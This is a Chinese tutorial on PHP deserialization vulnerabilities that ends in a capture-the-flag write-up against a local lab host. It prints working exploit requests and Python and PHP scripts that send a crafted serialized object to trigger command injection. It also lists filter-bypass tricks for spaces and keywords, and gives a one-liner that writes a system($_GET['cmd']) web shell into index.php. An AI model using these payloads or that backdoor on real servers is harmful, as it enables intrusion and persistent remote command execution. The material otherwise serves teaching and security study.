|
|
51CTO旗下网站
|
|
开户注册送38体验金端

PHP反序列化漏洞简介及相关技巧小结

php程序为了保存和转储对象,提供了序列化的方法,php序列化是为了在程序运行的过程中对对象进行转储而产生的。

作者:xiaopan233来源:Freebuf|2019-08-12 06:41

要学习PHP反序列漏洞,先了解下PHP序列化和反序列化是什么东西。

php程序为了保存和转储对象,提供了序列化的方法,php序列化是为了在程序运行的过程中对对象进行转储而产生的。序列化可以将对象转换成字符串,但仅保留对象里的成员变量,不保留函数方法。

php序列化的函数为serialize。反序列化的函数为unserialize。

PHP/反序列化/漏洞

序列化

举个栗子:

  1. <?php  
  2. class Test{  
  3.          public$a = 'ThisA' 
  4.          protected$b = 'ThisB' 
  5.          private$c = 'ThisC' 
  6.          publicfunction test1(){  
  7.                   return'this is test1 ';  
  8.          }  
  9.  
  10. $test = new Test();  
  11. var_dump(serialize($test));  
  12. ?> 

输出:

解释一下:

O代表是对象;:4表示改对象名称有4个字符;:”Test”表示改对象的名称;:3表示改对象里有3个成员。

接着是括号里面的。我们这个类的三个成员变量由于变量前的修饰不同,在序列化出来后显示的也不同。

第一个变量a序列化后为 s:1:”a”;s:5:”ThisA”;

由于变量是有变量名和值的。所以序列化需要把这两个都进行转换。序列化后的字符串以分号分割每一个变量的特性。

这个要根据分号来分开看,分号左边的是变量名,分号右边的是变量的值。

先看左边的。其实都是同理的。s表示是字符串,1表示该字符串中只有一个字符,”a”表示该字符串为a。右边的同理可得。

第二个变量和第一个变量有所不同,多了个乱码和 * 号。这是因为第一个变量a是public属性,而第二个变量b是protected属性,php为了区别这些属性所以进行了一些修饰。这个乱码查了下资料,其实是 %00(url编码,hex也就是0×00)。表示的是NULL。所以protected属性的表示方式是在变量名前加个%00*%00

第三个变量的属性是private。表示方式是在变量名前加上%00类名%00

可以看到虽然Test类中有test1这个方法,但是序列化后的字符串中并没有包含这个方法的信息。所以序列化不保存方法。

反序列化

  1. <?php 
  2.  
  3. class Test{ 
  4.  
  5.          public$a = 'ThisA'
  6.  
  7.          protected$b = 'ThisB'
  8.  
  9.          private$c = 'ThisC'
  10.  
  11.          publicfunction test1(){ 
  12.  
  13.                   return'this is test1 '; 
  14.  
  15.          } 
  16.  
  17.  
  18. $test = new Test(); 
  19.  
  20. $sTest = serialize($test); 
  21.  
  22. $usTest = unserialize($sTest); 
  23.  
  24. var_dump($usTest); 
  25.  
  26. ?> 

输出:

image.png

可以看到类的成员变量被还原了,但是类方法没有被还原,因为序列化的时候就没保存方法。

魔术方法

大概了解了php序列化和序列化的过程,那么就来介绍一下相关的魔术方法。

  • construct 当一个对象创建时被调用
  • destruct 当一个对象销毁时被调用
  • toString 当一个对象被当作一个字符串使用
  • sleep 在对象被序列化之前运行
  • wakeup 在对象被反序列化之后被调用

直接举栗子吧:

  1. <?php 
  2. classTest{ 
  3.          public function __construct(){ 
  4.                   echo 'construct run'; 
  5.          } 
  6.          public function __destruct(){ 
  7.                   echo 'destruct run'; 
  8.          } 
  9.          public function __toString(){ 
  10.                   echo 'toString run'; 
  11.          } 
  12.          public function __sleep(){ 
  13.                   echo 'sleep run'; 
  14.          } 
  15.          public function __wakeup(){ 
  16.                   echo 'wakeup run'; 
  17.          } 
  18. /**/ 
  19. echo'new了一个对象,对象被创建,执行__construct</br>'; 
  20. $testnew Test(); 
  21. /**/ 
  22. echo'</br>serialize了一个对象,对象被序列化,先执行__sleep,再序列化</br>'; 
  23. $sTestserialize($test); 
  24. /**/ 
  25. echo'</br>unserialize了一个序列化字符串,对象被反序列化,先反序列化,再执行__wakeup</br>'; 
  26. $usTestunserialize($sTest); 
  27. /**/ 
  28. echo'</br>把Test这个对象当做字符串使用了,执行__toString</br>'; 
  29. $string'hello class ' . $test; 
  30. /**/ 
  31. echo'</br>程序运行完毕,对象自动销毁,执行__destruct</br>'; 
  32. ?> 

输出:

image.png

可以看到有一个警告一个报错,是因为__sleep函数期望能return一个数组,而__toString函数则必须返回一个字符串。由于我们都是echo的没有写return,所以引发了这些报错,那么我们就按照报错的来,要什么加什么。

image.png

输出:

image.png

现在只需要明白这5个魔法函数的执行顺序即可,至于里面的代码就要看程序员或者出题人怎么写了。。。对于__construct函数的话我个人认为好像莫有多大用。。也许是我菜吧。。感觉没有什么地方能在反序列化的时候用上。欢迎大佬指点。

一道题目引发的技巧小结

了解了反序列化的基础和一些魔法函数后,我们来看到题吧。该题不仅考了反序列化,还简单考察了一下变量覆盖和命令注入的正则绕过。其中有一些坑我们可以看一下。

源码很简单:

  1. <?php  
  2. error_reporting(0);  
  3. class come{      
  4.    private $method;  
  5.    private $args;  
  6.    function __construct($method, $args) {  
  7.        $this->method = $method;  
  8.        $this->args = $args;  
  9.     }  
  10.    function __wakeup(){  
  11.        foreach($this->args as $k => $v) {  
  12.            $this->args[$k] = $this->waf(trim($v));  
  13.        }  
  14.     }  
  15.    function waf($str){  
  16.        $str=preg_replace("/[<>*;|?\n ]/","",$str);  
  17.        $str=str_replace('flag','',$str);  
  18.        return $str;  
  19.    }             
  20.    function echos($host){  
  21.        system("echos $host".$host);  
  22.     } 
  23.    function __destruct(){  
  24.        if (in_array($this->method, array("echos"))) {  
  25.            call_user_func_array(array($this, $this->method), $this->args);  
  26.        }  
  27.     }  
  28.  
  29. $first='hi' 
  30. $var='var' 
  31. $bbb='bbb' 
  32. $ccc='ccc' 
  33. $i=1 
  34. foreach($_GET as $key => $value) {  
  35.        if($i===1)  
  36.        { 
  37.             $i++;     
  38.            $$key = $value;  
  39.        }  
  40.        else{break;}  
  41.  
  42. if($first==="doller")  
  43.  
  44.    @parse_str($_GET['a']);  
  45.    if($var==="give")  
  46.     {  
  47.        if($bbb==="me") 
  48.        {  
  49.            if($ccc==="flag")  
  50.            { 
  51.                  echo"<br>welcome!<br>";  
  52.                 $come=@$_POST['come'];  
  53.                 unserialize($come);   
  54.            }  
  55.        }  
  56.        else  
  57.        {echo "<br>think about it<br>";}  
  58.     }  
  59.    else  
  60.     {  
  61.        echo "NO";  
  62.     }  
  63.  
  64. else  
  65.  
  66.    echo "Can you hack me?<br>";  
  67.  
  68. ?> 

拿到源码我们先简单浏览一下,看到parse_str就想到了用变量覆盖来过这些if语句,而parse_str的参数是通过GET请求中的a参数中获得,parse_str进行变量分割的符号是 & 号,没怎么多想就直接先打上一手请求先:

  1. ?first=doller&a=var=give&bbb=me&ccc=flag 

我原本的意愿是希望这样子被解析

  1. ?first=doller&a=var=give&bbb=me&ccc=flag 

希望红字是一个整体,是一个字符串,是a这个参数的值。总共的GET参数就两个,一个first一个a。但php解析的是。。。

  1. ?first=doller&a=var=give&bbb=me&ccc=flag 

即有4个参数,a的值是var=give,但遇到&号在url中就被解析成了GET参数的分割符,认为bbb=me是一个新的GET的参数。

不过好在有URL编码这种东西,可以在这有歧义的时候扭转局势,我们把&号进行URL编码,这样子解析时就会认为是一个字符串了。URL编码可以用php的urlencode函数。得到&的URL编码为%26。构造请求:

  1. ?first=doller&a=var=give%26bbb=me%26ccc=flag 

看到了欢迎字样:

查看代码,发现到了反序列化的地方了。而反序列化的来源是通过POST提交的come参数

image.png

知道了要反序列化,接下来就是确定要反序列化的类了。这个源码就一个类come。对这个类进行审计。

__construct感觉没什么用,先扔在一边,重点看__wakeup和__destruct函数,__wakeup是调用了一个waf函数,用来做正则过滤的,这个我们先放一下,我们看__destruct函数,它使用了call_user_func_array这个php内置的方法,作用是调用一个指定方法。举个这个函数的简单栗子:

image.png

第一个参数是要调用的函数,第二个参数是一个数组,用于给调用的函数传参。数组中第一个值就是函数中的第一个参数,以此类推。

但是题目中的call_user_func_array中的第一个参数是个数组,这什么意思呢。。?

数组的话就是数组的第一个元素表示是该方法所在的类,第二个元素就是方法名。

我们来看看这个类的成员变量吧,在可以反序列化后,就要明白这个类中的所有成员变量都是我们可控的,所以call_user_func_array()中的$this->method和$this->args也就是我们可控的。不过由于执行这个函数要通过一个if,且调用的函数必须是本类的函数,那我们就只能看看本类中还有什么方法吧。

我们看看进入call_user_func_array()函数前的if判断,它判断我们要调用的函数名是否在一个允许调用的列表里,而这个列表就只有echos这一个函数,也就是说我们的method变量已经限定死了,必须为echos。

那么我们只能去看看echos函数里有什么了,居然有system函数

image.png

那么我们就可以进行命令注入了,可以看到echos函数就只有一个形参,结合上面我们说到的call_user_func_array()函数,就形成了这样一个思路:

  • 通过反序列化控制method和args两个成员变量
  • method必须是echos不然通不过if判断
  • 通过call_user_func_array()函数第一个参数调用本类中的echos方法,第二个参数给方法传参-
  • 由于echos方法中的system函数的参数是拼接形参的,完成命令注入。

思路有了,那么我们看看args变量要怎么写吧。根据执行顺序,先wakeup再destruct(由于是反序列化的,不会执行construct,只有new才会执行construct)。那么我们看看wakeup中又进行了什么操作

image.png

可以看到它默认将args变量视为一个数组,对其进行了foreach,然后又对数组中的每个元素送去了waf进行过滤。这表明我们传入的args是一个数组。

再来看看waf函数是干嘛的。

image.png

第一行,正则匹配args的元素,如果元素中出现将斜杠/之间的任意一个字符,就将他们替换为空。这里过滤了|符号,这个有点伤,因为命令中是通过|进行管道的操作,在命令注入时用|进行拼接很有用,不过即使它禁用了,我们还可以通过& 达到多个命令一行执行的目的。

第二行,如果args中的元素中存在flag这个字符串,替换为空,也就是说我们要读取flag文件时要通过双写flag进行绕过。

这里注意一下system函数,有个坑。。。

echo写错写成了echos。。。。即这个命令本身就是错的,所以选择命令的分隔符要慎重。

资料:

  • 是不管前后命令是否执行成功都会执行前后命令
  • 是前面的命令执行成功才能执行后面的命令
  • 是前面的命令执行不成功才能执行后面的命令
  • 管道符

所以我们要使用&符而不能使用&&。

image.png

image.png

复制这一串序列化字符串到Postman上,然后既然我们都拿到源码了,我们把第2行的error_reporting(0);先注释起来,这个意思是抑制报错,这对我们调试代码很不友好,把报错打开才能更快找到问题所在。

image.png

发送payload,emmm…… no responose?

image.png

在这里思来想去,折腾了一下,后面通过var_dump才找到问题源头(var_dump大法好)

image.png

image.png

前面刚说了要注意类型。。。private和protected的变量名前都是有0×00的。。。echo的输出由于是NULL就空过去了,但是没有逃过var_dump的法眼(var_dump大法好)

那么我们就要手动添加0×00上去了,这里可以用python、php等编程语言将0×00转换成字符然后再通过他们自己的网络模块发送,

栗子:

python:(2.7)

通过decode和encode来进行编码

image.png

  1. import requests 
  2. s = requests.session() 
  3. url = "http://192.168.27.144/?first=doller&a=var=give%26bbb=me%26ccc=flag" 
  4. n = '00'.decode('hex') 
  5. o = 'O:4:"come":2:{s:12:"'+n+'come'+n+'method";s:5:"echos";s:10:"'+n+'come'+n+'args";a:1:{i:0;s:3:"&ls";}}' 
  6. r = requests.post(url,data={"come":o}) 
  7. print(r.text) 

php:

通过urldecode进行对%00进行解码

  1. <?php  
  2. $curl = curl_init();  
  3. curl_setopt($curl,CURLOPT_URL,'http://192.168.27.144/?first=doller&a=var=give%26bbb=me%26ccc=flag');  
  4. curl_setopt($curl,CURLOPT_POST, 1);  
  5. $n = urldecode('%00');  
  6. $o = 'O:4:"come":2:{s:12:"'.$n.'come'.$n.'method";s:5:"echos";s:10:"'.$n.'come'.$n.'args";a:1:{i:0;s:3:"&ls";}}';  
  7. curl_setopt($curl,CURLOPT_POSTFIELDS, ['come'=>$o]);  
  8. curl_exec($curl);  
  9. curl_close($curl);  
  10. ?> 

不过有更快的方法。。。直接通过postman的urlencode/urldecode即可。因为0×00也就是url编码中的%00。所以url编码一下就完事。

要用%00包裹住类名,不能包多了也不能包少了,虽然%00也算一个字符,但是Php序列化的时候已经帮我们算好了,所以不需要修改,或者说,我们之前的那个长度值就是错的。。。

选中%00,右键,选择decode即可。

结果:

我们再发送,有response了,

发现有flag.txt。由于我是windows环境,读取文件使用type命令。

type命令格式:type文件路径

修改payload。

发现无回显

命令是对的,是因为刚刚我们忽略的waf函数在作怪。刚刚提到wakup时将每个args变量拿去在waf函数中洗了个澡。过滤内容为:

flag这个字符串被替换为空,可以通过双写flag来绕过:flflagag

不过在第一个正则中过滤了空格就有点难受了,总所周知系统命令都是要打个空格才能添加参数的,过滤了空格怎么破?

思来想去后,发现windows没有人提供资料,但是linux下有很多。

绕过方法:

  1. !! (最好一开始就先用这个,执行上一条命令,也许有奇效。。)  
  2. cat${IFS}flag.txt  
  3. cat$IFS$9flag.txt  
  4. cat<flag.txt  
  5. cat<>flag.txt  
  6. {cat,flag.txt}  
  7. KG=$’\x20flag.txt’&&cat$KG (\x20转换成字符串就是空格,这里通过变量的方式巧妙绕过) 

随便用一个(linux环境下):

windows环境下的话时我突发奇想随便试出来的。适用性不是很广,也就type这个命令能用用。。

  1. type.\flag.txt  
  2. type,flag.txt  
  3. echo,123456 

echo的话这个如果脑洞大点可以通过echo >>的方式将一句话追加到php文件末尾,达到getShell的目的。不过这样子如果该php文件很规范的用了?>结尾就莫得,如果没有那么规范,没用?>结尾就可以成功。

示例:

  1. echo,@system($_GET['cmd']);>>index.php 

然后就可以通过新的后门来getshell了。

【编辑推荐】

  1. 上千安卓APP被曝存漏洞 未经许可共享新用户注册送47元彩金
【责任编辑:赵宁宁 TEL:(010)68476606】

点赞 0
分享:
大家都在看
猜你喜欢

订阅专栏+更多

这就是5G

这就是5G

5G那些事儿
共15章 | armmay

58人订阅学习

16招轻松掌握PPT技巧

16招轻松掌握PPT技巧

GET职场加薪技能
共16章 | 晒书包

349人订阅学习

20个局域网建设改造案例

20个局域网建设改造案例

网络搭建技巧
共20章 | 捷哥CCIE

723人订阅学习

读 书 +更多

Fedora Core 5 Linux架站与网管

Linux出色的网络功能堪称当今操作系统中的佼佼者,无论在功能还是在支持能力上都有令人满意的表现。Linux内置的多个服务器,几乎包含了目前...

订阅51CTO邮刊

点击这里查看样刊

订阅51CTO邮刊

51CTO服务号

51CTO播客

博聚网